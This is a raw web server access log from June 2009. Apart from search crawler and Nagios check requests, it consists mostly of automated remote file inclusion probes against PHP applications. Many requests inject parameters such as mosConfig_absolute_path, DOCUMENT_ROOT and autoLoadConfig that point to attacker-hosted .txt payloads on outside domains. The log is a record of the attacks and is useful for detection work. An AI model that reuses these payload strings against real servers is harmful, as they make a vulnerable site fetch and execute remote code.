66.249.71.14 - - [08/Jun/2009:03:36:28 -0400] "GET /logs/access_log.Q108021600 HTTP/1.1" 404 224 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [08/Jun/2009:03:36:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
65.98.59.178 - - [08/Jun/2009:03:36:55 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:03:36:55 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:03:36:55 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:03:36:57 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:03:36:57 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:03:36:57 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
65.98.59.178 - - [08/Jun/2009:03:37:02 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:11 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:11 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:11 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:14 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:14 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:14 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:17 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:37:21 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:33 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:33 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:33 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:33 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:33 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:33 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:37:39 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:37:39 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:37:43 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:51 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:37:53 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.142.25.74 - - [08/Jun/2009:03:37:56 -0400] "GET /logs/error_log.Q109050600/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.finatech.jp/hp/tmp/fck.txt?? HTTP/1.1" 404 257 "-" "libwww-perl/5.819"
83.142.25.74 - - [08/Jun/2009:03:37:56 -0400] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.finatech.jp/hp/tmp/fck.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.819"
83.142.25.74 - - [08/Jun/2009:03:37:56 -0400] "GET /logs/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.finatech.jp/hp/tmp/fck.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.819"
121.165.73.157 - - [08/Jun/2009:03:37:58 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
80.67.20.178 - - [08/Jun/2009:03:38:10 -0400] "GET /logs/access_log.Q109051700/e404.php?DOCUMENT_ROOT=http://www.eyepro.net//assets/images/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:38:30 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:38:30 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:38:31 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
212.150.52.114 - - [08/Jun/2009:03:38:45 -0400] "GET /logs/access_log.Q108052700//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:03:38:46 -0400] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
212.150.52.114 - - [08/Jun/2009:03:38:46 -0400] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
121.165.73.157 - - [08/Jun/2009:03:38:48 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:00 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:00 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:00 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:04 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
200.142.148.142 - - [08/Jun/2009:03:39:07 -0400] "GET /logs/access_log.Q109050300/login.php?dir=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.142.148.142 - - [08/Jun/2009:03:39:07 -0400] "GET /logs/access_log.Q109060500/login.php?dir=http://inbus.cn/home/copyright.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:39 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:39 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:39:39 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
212.150.52.114 - - [08/Jun/2009:03:39:49 -0400] "GET /logs/access_log.Q109052200//modules/4nAlbum/public/displayCategory.php?basepath=http://www.angelcitytrading.com//css/id.txt?? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
66.175.122.228 - - [08/Jun/2009:03:39:50 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:40:00 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:40:03 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:40:03 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:40:06 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:40:08 -0400] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:40:08 -0400] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:40:08 -0400] "GET /logs/access_log.Q109051700/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:40:14 -0400] "GET /logs/access_log.Q109053100/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:40:14 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.184.52.8 - - [08/Jun/2009:03:40:14 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:40:26 -0400] "GET /////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
83.142.25.74 - - [08/Jun/2009:03:40:34 -0400] "GET /allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=http://www.finatech.jp/hp/tmp/fck.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.819"
70.85.165.10 - - [08/Jun/2009:03:41:32 -0400] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 4642 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:41:32 -0400] "GET /logs/access_log.Q109050300/////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:41:42 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:41:47 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
209.59.12.99 - - [08/Jun/2009:03:41:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
87.106.67.146 - - [08/Jun/2009:03:42:04 -0400] "GET /logs/access_log.Q109051800/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:03:42:04 -0400] "GET /twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:03:42:05 -0400] "GET /logs/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:03:42:09 -0400] "GET /logs/access_log.Q109051800/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:03:42:10 -0400] "GET /twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.805"
87.106.67.146 - - [08/Jun/2009:03:42:13 -0400] "GET /logs/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/idhijau.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
74.6.22.170 - - [08/Jun/2009:03:42:10 -0400] "GET /images/ACE_RCF_RCT_sellsheet.pdf HTTP/1.0" 200 735799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.165.10 - - [08/Jun/2009:03:42:27 -0400] "GET /logs/access_log.Q108062200%20%20//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:42:34 -0400] "GET /logs/access_log.Q109050700%20%20//admin/business_inc/saveserver.php?thisdir=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:42:52 -0400] "GET /logs/access_log.Q109050700/////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
124.32.56.166 - - [08/Jun/2009:03:42:55 -0400] "GET //skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
124.32.56.166 - - [08/Jun/2009:03:42:55 -0400] "GET /logs/error_log.Q109051200//skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
124.32.56.166 - - [08/Jun/2009:03:42:56 -0400] "GET /logs//skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 228 "-" "libwww-perl/5.79"
124.32.56.166 - - [08/Jun/2009:03:43:04 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/setup.php?dir=http://www.finatech.jp/hp/tmp/fck.txt????? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
87.106.67.146 - - [08/Jun/2009:03:43:13 -0400] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:13 -0400] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:13 -0400] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:13 -0400] "GET /logs/access_log.Q109053100%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:13 -0400] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:15 -0400] "GET /logs/access_log.Q109053100%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:18 -0400] "GET //?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:18 -0400] "GET /logs//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 4639 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:19 -0400] "GET /logs/access_log.Q109053100%20%20//?sIncPath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:48 -0400] "GET /logs/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:49 -0400] "GET /twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:43:51 -0400] "GET /logs/access_log.Q109051800%20%20/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:44:12 -0400] "GET /twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:44:12 -0400] "GET /logs/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:44:12 -0400] "GET /logs/access_log.Q109051800%20%20/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:44:17 -0400] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:44:17 -0400] "GET /logs/access_log.Q109051700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:44:18 -0400] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
195.22.11.158 - - [08/Jun/2009:03:44:18 -0400] "GET /logs/access_log.Q109050700%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:44:25 -0400] "GET /logs/access_log.Q109051800/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:44:35 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:44:41 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
66.175.122.228 - - [08/Jun/2009:03:44:41 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:44:44 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:44:47 -0400] "GET /logs/access_log.Q109051800/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:45:23 -0400] "GET /logs/access_log.Q109050300%20%20/////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
70.85.165.10 - - [08/Jun/2009:03:45:31 -0400] "GET /logs/access_log.Q109050700%20%20/////?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:45:33 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
122.201.76.100 - - [08/Jun/2009:03:45:33 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:45:44 -0400] "GET /logs/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:45:44 -0400] "GET /twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:45:44 -0400] "GET /logs/access_log.Q109051800/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:03:45:52 -0400] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:03:45:52 -0400] "GET /logs/access_log.Q109051100//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
124.0.73.2 - - [08/Jun/2009:03:45:52 -0400] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://kamtiez.comind.it/idxx.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
87.106.67.146 - - [08/Jun/2009:03:45:54 -0400] "GET /logs/access_log.Q109051800%20%20/twindow_notice.php?shop_this_skin_path=http://napfia.hu/_userfiles/flash/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:46:06 -0400] "GET /logs/access_log.Q109051700%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
121.165.73.157 - - [08/Jun/2009:03:46:08 -0400] "GET /logs/access_log.Q109053100%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.promodelia.com/uiu.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
